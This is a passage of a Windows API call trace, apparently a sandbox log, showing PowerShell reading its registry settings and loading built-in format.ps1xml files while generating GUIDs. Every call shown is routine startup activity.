	[0510.147] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.148] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.148] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.149] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.149] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.149] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.150] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.150] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0xe67, lpOverlapped=0x0) returned 1
	[0510.150] ReadFile (in: hFile=0x320, lpBuffer=0x2f7d0f7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7d0f7*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0510.150] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0510.150] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d0c8 | out: phkResult=0x14d0c8*=0x320) returned 0x0
	[0510.150] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d04c, lpData=0x0, lpcbData=0x14d048*=0x0 | out: lpType=0x14d04c*=0x1, lpData=0x0, lpcbData=0x14d048*=0x56) returned 0x0
	[0510.151] CoTaskMemAlloc (cb=0x5a) returned 0x3ce5c0
	[0510.151] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d01c, lpData=0x3ce5c0, lpcbData=0x14d018*=0x56 | out: lpType=0x14d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d018*=0x56) returned 0x0
	[0510.151] CoTaskMemFree (pv=0x3ce5c0) 
	[0510.151] RegCloseKey (hKey=0x320) returned 0x0
	[0510.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0510.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0510.152] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x26dd6649, Data2=0x242d, Data3=0x49f0, Data4=([0]=0xa7, [1]=0x9, [2]=0xab, [3]=0x77, [4]=0xcf, [5]=0x71, [6]=0xe5, [7]=0x72))) returned 0x0
	[0510.153] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x4ffd6d52, Data2=0x1871, Data3=0x4979, Data4=([0]=0x86, [1]=0x5, [2]=0x15, [3]=0xd5, [4]=0x25, [5]=0xe9, [6]=0x5b, [7]=0xe7))) returned 0x0
	[0510.153] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x3e68a69d, Data2=0x90e, Data3=0x43ce, Data4=([0]=0x9f, [1]=0x1f, [2]=0xac, [3]=0x42, [4]=0x8c, [5]=0xc5, [6]=0x88, [7]=0xad))) returned 0x0
	[0510.153] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x7904456c, Data2=0x1476, Data3=0x4ac0, Data4=([0]=0xbe, [1]=0xf9, [2]=0x14, [3]=0x8c, [4]=0xc1, [5]=0x3d, [6]=0x2c, [7]=0x31))) returned 0x0
	[0510.153] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x97b9ae9, Data2=0x4878, Data3=0x4661, Data4=([0]=0x99, [1]=0xd4, [2]=0x98, [3]=0x28, [4]=0x48, [5]=0x12, [6]=0xb9, [7]=0x34))) returned 0x0
	[0510.153] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x588449e6, Data2=0xe72a, Data3=0x47ad, Data4=([0]=0x8a, [1]=0x69, [2]=0xa2, [3]=0xa7, [4]=0x91, [5]=0xd2, [6]=0x38, [7]=0xe7))) returned 0x0
	[0510.153] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x5b8a3d87, Data2=0x1f58, Data3=0x4238, Data4=([0]=0x88, [1]=0xbb, [2]=0x50, [3]=0x90, [4]=0xc, [5]=0xfe, [6]=0xfe, [7]=0x42))) returned 0x0
	[0510.154] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x4612216b, Data2=0x9dee, Data3=0x4bb0, Data4=([0]=0x9e, [1]=0xc4, [2]=0x63, [3]=0x66, [4]=0x80, [5]=0xab, [6]=0x3f, [7]=0xb5))) returned 0x0
	[0510.154] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x3af4afcb, Data2=0xac0b, Data3=0x4f52, Data4=([0]=0xba, [1]=0x35, [2]=0x24, [3]=0x3f, [4]=0x3e, [5]=0x98, [6]=0x57, [7]=0x80))) returned 0x0
	[0510.154] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xec5974fa, Data2=0x9e23, Data3=0x4b93, Data4=([0]=0xab, [1]=0x4b, [2]=0x5, [3]=0x45, [4]=0xd8, [5]=0x96, [6]=0x2c, [7]=0x12))) returned 0x0
	[0510.154] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x4abcff13, Data2=0x8079, Data3=0x46cb, Data4=([0]=0x95, [1]=0xe5, [2]=0x70, [3]=0xeb, [4]=0x67, [5]=0x43, [6]=0xf5, [7]=0xd6))) returned 0x0
	[0510.747] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xd4888379, Data2=0x6808, Data3=0x451d, Data4=([0]=0xa6, [1]=0xd4, [2]=0x75, [3]=0x1d, [4]=0xbd, [5]=0x4, [6]=0x7c, [7]=0xe1))) returned 0x0
	[0510.748] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x48f92743, Data2=0xc842, Data3=0x46e6, Data4=([0]=0x91, [1]=0x6, [2]=0xf4, [3]=0xee, [4]=0x2, [5]=0x31, [6]=0xa3, [7]=0x42))) returned 0x0
	[0510.748] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x61cf30ef, Data2=0x7430, Data3=0x45f3, Data4=([0]=0x9d, [1]=0x80, [2]=0x1d, [3]=0x8a, [4]=0xaa, [5]=0x59, [6]=0x2a, [7]=0xd5))) returned 0x0
	[0510.748] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xc9211da2, Data2=0xa536, Data3=0x4fbd, Data4=([0]=0x94, [1]=0xf7, [2]=0xf5, [3]=0xbe, [4]=0xa5, [5]=0x75, [6]=0xf8, [7]=0x5d))) returned 0x0
	[0510.748] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xfb28d0fc, Data2=0x36ec, Data3=0x454c, Data4=([0]=0xa5, [1]=0xe9, [2]=0x4d, [3]=0x94, [4]=0x9b, [5]=0xc3, [6]=0x53, [7]=0x9f))) returned 0x0
	[0510.748] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xa90fcd9b, Data2=0x30fe, Data3=0x412d, Data4=([0]=0xb9, [1]=0xdd, [2]=0xf5, [3]=0xc1, [4]=0xb1, [5]=0xe0, [6]=0xdb, [7]=0xb0))) returned 0x0
	[0510.748] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x45adf603, Data2=0xabcd, Data3=0x443a, Data4=([0]=0xb9, [1]=0x12, [2]=0xee, [3]=0xdc, [4]=0x26, [5]=0xee, [6]=0xf1, [7]=0x8a))) returned 0x0
	[0510.748] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x93dd796c, Data2=0x4ca2, Data3=0x4363, Data4=([0]=0x99, [1]=0xa6, [2]=0x85, [3]=0xa8, [4]=0xdc, [5]=0x35, [6]=0xfc, [7]=0xdf))) returned 0x0
	[0510.749] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x52250781, Data2=0xdba, Data3=0x437a, Data4=([0]=0x87, [1]=0x26, [2]=0x64, [3]=0x1c, [4]=0xf6, [5]=0x1d, [6]=0xd9, [7]=0x6d))) returned 0x0
	[0510.749] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x57fffaf0, Data2=0xa4f1, Data3=0x427a, Data4=([0]=0xa0, [1]=0x80, [2]=0xd2, [3]=0x7c, [4]=0xaa, [5]=0xaa, [6]=0xf6, [7]=0x3a))) returned 0x0
	[0510.749] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xc27d4014, Data2=0xa4b8, Data3=0x4cd7, Data4=([0]=0x94, [1]=0x47, [2]=0x80, [3]=0xd2, [4]=0xee, [5]=0x92, [6]=0x81, [7]=0xcd))) returned 0x0
	[0510.749] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x5b8191c7, Data2=0xfbaa, Data3=0x4531, Data4=([0]=0x8e, [1]=0xaa, [2]=0x2b, [3]=0x65, [4]=0x64, [5]=0x1, [6]=0xd8, [7]=0xfc))) returned 0x0
	[0510.749] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xeecbc244, Data2=0x6c24, Data3=0x462b, Data4=([0]=0x8d, [1]=0x91, [2]=0x14, [3]=0xf0, [4]=0x79, [5]=0x4f, [6]=0x25, [7]=0x95))) returned 0x0
	[0510.750] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x393a665e, Data2=0xcae9, Data3=0x461d, Data4=([0]=0xb6, [1]=0x1b, [2]=0x15, [3]=0xc, [4]=0x46, [5]=0xa4, [6]=0xc, [7]=0xca))) returned 0x0
	[0510.750] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xfa2280f6, Data2=0x57d, Data3=0x40da, Data4=([0]=0xb9, [1]=0x33, [2]=0x7f, [3]=0xed, [4]=0x30, [5]=0xfd, [6]=0x10, [7]=0x80))) returned 0x0
	[0510.750] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xf0083ea, Data2=0xc919, Data3=0x4feb, Data4=([0]=0xa5, [1]=0xee, [2]=0xdb, [3]=0x31, [4]=0x4d, [5]=0x35, [6]=0xc5, [7]=0xf6))) returned 0x0
	[0510.750] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xae4f1f6b, Data2=0x2e8a, Data3=0x4f4a, Data4=([0]=0xa6, [1]=0x66, [2]=0x23, [3]=0x6a, [4]=0xb0, [5]=0xfd, [6]=0xa4, [7]=0xc6))) returned 0x0
	[0510.750] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xf44c3c2c, Data2=0x5c17, Data3=0x4237, Data4=([0]=0x9b, [1]=0xf2, [2]=0xbe, [3]=0x3b, [4]=0xd8, [5]=0x2, [6]=0xf6, [7]=0x72))) returned 0x0
	[0510.750] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x83d8f18c, Data2=0xc001, Data3=0x424d, Data4=([0]=0xb6, [1]=0x88, [2]=0xe0, [3]=0x73, [4]=0x50, [5]=0x7a, [6]=0x39, [7]=0x4f))) returned 0x0
	[0510.750] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x369ba384, Data2=0x1d43, Data3=0x4f04, Data4=([0]=0xa1, [1]=0x26, [2]=0xe6, [3]=0x26, [4]=0x6d, [5]=0x73, [6]=0x2a, [7]=0x33))) returned 0x0
	[0510.751] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x8ed45d5, Data2=0x6848, Data3=0x46f8, Data4=([0]=0x91, [1]=0xfc, [2]=0x2a, [3]=0xfa, [4]=0x2d, [5]=0x3f, [6]=0x85, [7]=0x82))) returned 0x0
	[0510.751] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x2a2d4eeb, Data2=0x929c, Data3=0x481d, Data4=([0]=0x82, [1]=0xd9, [2]=0x42, [3]=0x6e, [4]=0x0, [5]=0xb, [6]=0x27, [7]=0x38))) returned 0x0
	[0510.756] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xeec19298, Data2=0xbcb0, Data3=0x4a80, Data4=([0]=0x8b, [1]=0x90, [2]=0x5d, [3]=0xa0, [4]=0x4a, [5]=0xc5, [6]=0x7b, [7]=0x27))) returned 0x0
	[0510.757] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x4f0999fe, Data2=0x4d84, Data3=0x449c, Data4=([0]=0x82, [1]=0xed, [2]=0x30, [3]=0x59, [4]=0x43, [5]=0xb8, [6]=0x6f, [7]=0x5e))) returned 0x0
	[0510.757] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x83beb246, Data2=0x7981, Data3=0x4338, Data4=([0]=0xb2, [1]=0x96, [2]=0xc1, [3]=0x69, [4]=0x2, [5]=0x7a, [6]=0x2d, [7]=0x4e))) returned 0x0
	[0510.757] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x50894ce4, Data2=0xa871, Data3=0x4438, Data4=([0]=0xb6, [1]=0x27, [2]=0x6e, [3]=0xfc, [4]=0x0, [5]=0xc1, [6]=0x2c, [7]=0x2d))) returned 0x0
	[0510.757] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x3e60a43b, Data2=0x158d, Data3=0x44a5, Data4=([0]=0xa6, [1]=0xed, [2]=0xb, [3]=0xb4, [4]=0xde, [5]=0xa3, [6]=0x85, [7]=0xc1))) returned 0x0
	[0510.757] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xb203c795, Data2=0x637a, Data3=0x4235, Data4=([0]=0xaa, [1]=0x6b, [2]=0x2f, [3]=0xca, [4]=0xb2, [5]=0x55, [6]=0xe, [7]=0xf4))) returned 0x0
	[0510.757] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xa965a88d, Data2=0x833b, Data3=0x40a7, Data4=([0]=0x81, [1]=0x45, [2]=0x95, [3]=0x44, [4]=0x1c, [5]=0x69, [6]=0x5b, [7]=0xce))) returned 0x0
	[0510.757] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x7c4c27cd, Data2=0x2eea, Data3=0x4b0e, Data4=([0]=0xb4, [1]=0xd0, [2]=0xec, [3]=0xd6, [4]=0x11, [5]=0x7e, [6]=0x3d, [7]=0x48))) returned 0x0
	[0510.758] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xe26e36d6, Data2=0x1937, Data3=0x4b8e, Data4=([0]=0x92, [1]=0xe0, [2]=0xf3, [3]=0x73, [4]=0x59, [5]=0x5c, [6]=0xdc, [7]=0xa6))) returned 0x0
	[0510.758] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xe9d7c2e4, Data2=0x4d4e, Data3=0x43c1, Data4=([0]=0xb2, [1]=0x20, [2]=0xc6, [3]=0x3c, [4]=0x78, [5]=0x8, [6]=0x10, [7]=0x35))) returned 0x0
	[0510.758] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x6fdfb0b0, Data2=0xe8fd, Data3=0x4fa8, Data4=([0]=0xbf, [1]=0x8a, [2]=0x80, [3]=0xc6, [4]=0xf4, [5]=0xf9, [6]=0x40, [7]=0x86))) returned 0x0
	[0510.758] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xbeca08b6, Data2=0x2b94, Data3=0x4da9, Data4=([0]=0xa8, [1]=0x30, [2]=0xf7, [3]=0x62, [4]=0x8c, [5]=0xfe, [6]=0xa7, [7]=0x16))) returned 0x0
	[0510.758] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x87dc72c2, Data2=0xc44f, Data3=0x48e9, Data4=([0]=0xb3, [1]=0x59, [2]=0xf2, [3]=0x62, [4]=0x2e, [5]=0xb, [6]=0xec, [7]=0x83))) returned 0x0
	[0510.758] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x41123f2d, Data2=0x9f94, Data3=0x4219, Data4=([0]=0xab, [1]=0xa7, [2]=0x64, [3]=0x87, [4]=0x72, [5]=0x92, [6]=0xa0, [7]=0x7e))) returned 0x0
	[0510.758] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x55fe5056, Data2=0x18f3, Data3=0x4d89, Data4=([0]=0x9b, [1]=0xac, [2]=0x35, [3]=0xec, [4]=0xaf, [5]=0x59, [6]=0x14, [7]=0x2a))) returned 0x0
	[0510.759] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0510.759] GetFileType (hFile=0x320) returned 0x1
	[0510.759] SetErrorMode (uMode=0x1) returned 0x1
	[0510.759] GetFileType (hFile=0x320) returned 0x1
	[0510.759] ReadFile (in: hFile=0x320, lpBuffer=0x30dbb80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x30dbb80*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.760] ReadFile (in: hFile=0x320, lpBuffer=0x30dbb80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x30dbb80*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.760] ReadFile (in: hFile=0x320, lpBuffer=0x30dbb80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x30dbb80*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.760] ReadFile (in: hFile=0x320, lpBuffer=0x30dbb80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x30dbb80*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.760] ReadFile (in: hFile=0x320, lpBuffer=0x30dbb80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x30dbb80*, lpNumberOfBytesRead=0x14d038*=0x8b4, lpOverlapped=0x0) returned 1
	[0510.761] ReadFile (in: hFile=0x320, lpBuffer=0x30daf9c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x30daf9c*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0510.761] ReadFile (in: hFile=0x320, lpBuffer=0x30dbb80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x30dbb80*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0510.761] CloseHandle (hObject=0x320) returned 1
	[0510.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0510.761] SetErrorMode (uMode=0x1) returned 0x1
	[0510.761] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cfe0 | out: lpFileInformation=0x14cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0510.761] SetErrorMode (uMode=0x1) returned 0x1
	[0510.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0510.762] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d0c8 | out: phkResult=0x14d0c8*=0x320) returned 0x0
	[0510.762] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d04c, lpData=0x0, lpcbData=0x14d048*=0x0 | out: lpType=0x14d04c*=0x1, lpData=0x0, lpcbData=0x14d048*=0x56) returned 0x0
	[0510.762] CoTaskMemAlloc (cb=0x5a) returned 0x3ce5c0
	[0510.762] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d01c, lpData=0x3ce5c0, lpcbData=0x14d018*=0x56 | out: lpType=0x14d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d018*=0x56) returned 0x0
	[0510.762] CoTaskMemFree (pv=0x3ce5c0) 
	[0510.762] RegCloseKey (hKey=0x320) returned 0x0
	[0510.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0510.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0510.763] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x195af596, Data2=0xc670, Data3=0x408b, Data4=([0]=0x85, [1]=0x6d, [2]=0x2, [3]=0xd7, [4]=0xb6, [5]=0x43, [6]=0xea, [7]=0xbf))) returned 0x0
	[0510.763] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xd0669d79, Data2=0x554, Data3=0x4223, Data4=([0]=0x91, [1]=0x97, [2]=0x5, [3]=0xd9, [4]=0x31, [5]=0x37, [6]=0xa4, [7]=0xb0))) returned 0x0
	[0510.763] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0510.763] GetFileType (hFile=0x320) returned 0x1
	[0510.763] SetErrorMode (uMode=0x1) returned 0x1
	[0510.763] GetFileType (hFile=0x320) returned 0x1
	[0510.763] ReadFile (in: hFile=0x320, lpBuffer=0x3119968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x3119968*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.764] ReadFile (in: hFile=0x320, lpBuffer=0x3119968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x3119968*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.764] ReadFile (in: hFile=0x320, lpBuffer=0x3119968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x3119968*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.765] ReadFile (in: hFile=0x320, lpBuffer=0x3119968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x3119968*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.765] ReadFile (in: hFile=0x320, lpBuffer=0x3119968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x3119968*, lpNumberOfBytesRead=0x14d038*=0xe98, lpOverlapped=0x0) returned 1
	[0510.765] ReadFile (in: hFile=0x320, lpBuffer=0x3118f68, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x3118f68*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0510.765] ReadFile (in: hFile=0x320, lpBuffer=0x3119968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x3119968*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0510.765] CloseHandle (hObject=0x320) returned 1
	[0510.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0510.765] SetErrorMode (uMode=0x1) returned 0x1
